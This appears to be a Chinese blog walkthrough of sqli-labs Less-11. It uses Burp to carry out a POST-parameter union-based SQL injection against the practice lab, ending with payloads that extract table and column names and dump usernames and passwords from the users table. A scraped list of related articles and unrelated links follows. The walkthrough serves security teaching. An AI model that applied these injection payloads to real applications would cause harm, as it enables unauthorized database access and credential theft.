sqli-labs less11 POST注入

注入工具:burp

(1)判断类型:
burp抓包,看到传参admin,是可以正常显示的:

and 1 = 1

异常,估计不是数字型

尝试单引号:

报错了,好征兆

and 1=1 --+

and 1 = 2 --+

由此,断定这个字符型 的闭合就是’

(2)判断字段个数:

order by 1回显正常

order by 2回显正常

order by 3回显错误

判断字段个数是2个

(3)判断回显位置:

显然,两个回显位置都可以

(4)爆数据库名:
uname=-1 ’ union select 1,database() --+ &passwd=admin&submit=Submit

数据库名:security

(5)数据表名:
uname=-1 ’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit

数据表名:
emails,referers,uagents,users

(6)挑选数据表users进行查询:
uname=-1 ’ union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’ --+ &passwd=admin&submit=Submit

查询到字段:
id,username,password

(7)爆数据:

uname=-1 ’ union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit

sqli-labs less11 POST注入-字符型相关推荐

  1. SQLi LABS Less-11 联合注入+报错注入

    第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...

  2. 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(七)-SQL注入字符型

    目录 前言: 一.简介 二.项目配置 三.代码编写 四.运行测试 前言: 前面完成了 SQL 注入漏洞的数字型输入,其实 SQL 注入漏洞还有很多其他类型的注入,例如:字符型注入.宽字节注入等,相应的 ...

  3. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  4. SQLi LABS Less-12 联合注入+报错注入

    第十二关是双引号+括号的字符型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入:a") or 1 ...

  5. SQLi LABS Less-4 联合注入+报错注入

    第四关是双引号+括号的字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 地址栏输入 ?id=1") and 1 ...

  6. SQLi LABS Less-3 联合注入+报错注入

    第三关是单引号+括号的字符型注入 ,推荐使用联合注入.报错注入. 方式一:联合注入 推荐文章:联合注入使用详解,原理+步骤+实战教程 第一步.判断注入点类型 地址栏输入 ?id=1') and 1 - ...

  7. SQLi Labs Less-1 联合注入+报错注入

    第一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入:?id=1' and 1 -- a,正常显示 ...

  8. 【less-11】基于SQLI的POST字符型SQL注入

    实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 实验环境 实验原理 实验步骤 第一步 判断是够存在POST型注入点 ...

  9. 【less-1】基于SQLI的SQL字符型报错注入

    实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 文章目录 实验目的 实验环境 实验原理 实验步骤 第一步 登录SQLI-Labs平台 第二步 登录Kali平台,启动 ...

最新文章

  1. 评阅上百篇博士学位论文后专家发现:博士生SCI发的越多,通常科研能力越差...
  2. zabbix监控远端主机
  3. maven project module 依赖项目创建 ---转
  4. extern和static的区别
  5. 【转】DICOM文件格式剖析(初识)
  6. 关于代理转发,代码如下具体还有待理解
  7. wow修改人物模型_一张照片生成人物动画!三星最新AI研究成果出炉
  8. cocos2d-x学习之添加显示文字
  9. Linux入门自学笔记
  10. ASP.NET AJAX的客户端框架是鸡肋?
  11. 【操作系统】代码实践:先来先服务调度算法(FCFS),短进程优先调度算法(SJF),高响应比优先调度算法(HRRN)
  12. 服务器主板维修教学视频,第60讲 超微服务器主板远程管理讲解与演示
  13. 【AR】DroidCam笔记本调用手机摄像头(smartphone's camera as pc webcam)
  14. Node.js 读取图片
  15. 针对linux系统中/usr/src/kernels中找不到内核源码的问题
  16. 查看文章影响因子的插件_查询文献可实时显示影响因子与分区排名的2个强大浏览器插件...
  17. 手机5g什么时候普及_5g什么时候普及民用
  18. 二、流水线的执行流程
  19. OSChina 周五乱弹 ——论HR的日常心塞
  20. HTML(2) 实现一个简单的注册页面

热门文章

  1. Sublime text无法自动通过package control安装插件的研究
  2. 获得ABAP report里定义的所有变量及type - GET_GLOBAL_SYMBOLS
  3. SAP Odata服务里filter的用法
  4. SAP CRM my task 6个roundtrip的原理讲解
  5. 如何在SAP CRM Fiori My Task应用里创建task
  6. 从OpenFOAM的源码中查找信息
  7. 计算机网络思科实验,思科综合实验
  8. 软件测试理论入门(一)
  9. 从前序与中序遍历序列构造二叉树Python解法
  10. java判断字符串是什么编码_java可供判断某字符串是什么编码的一行代码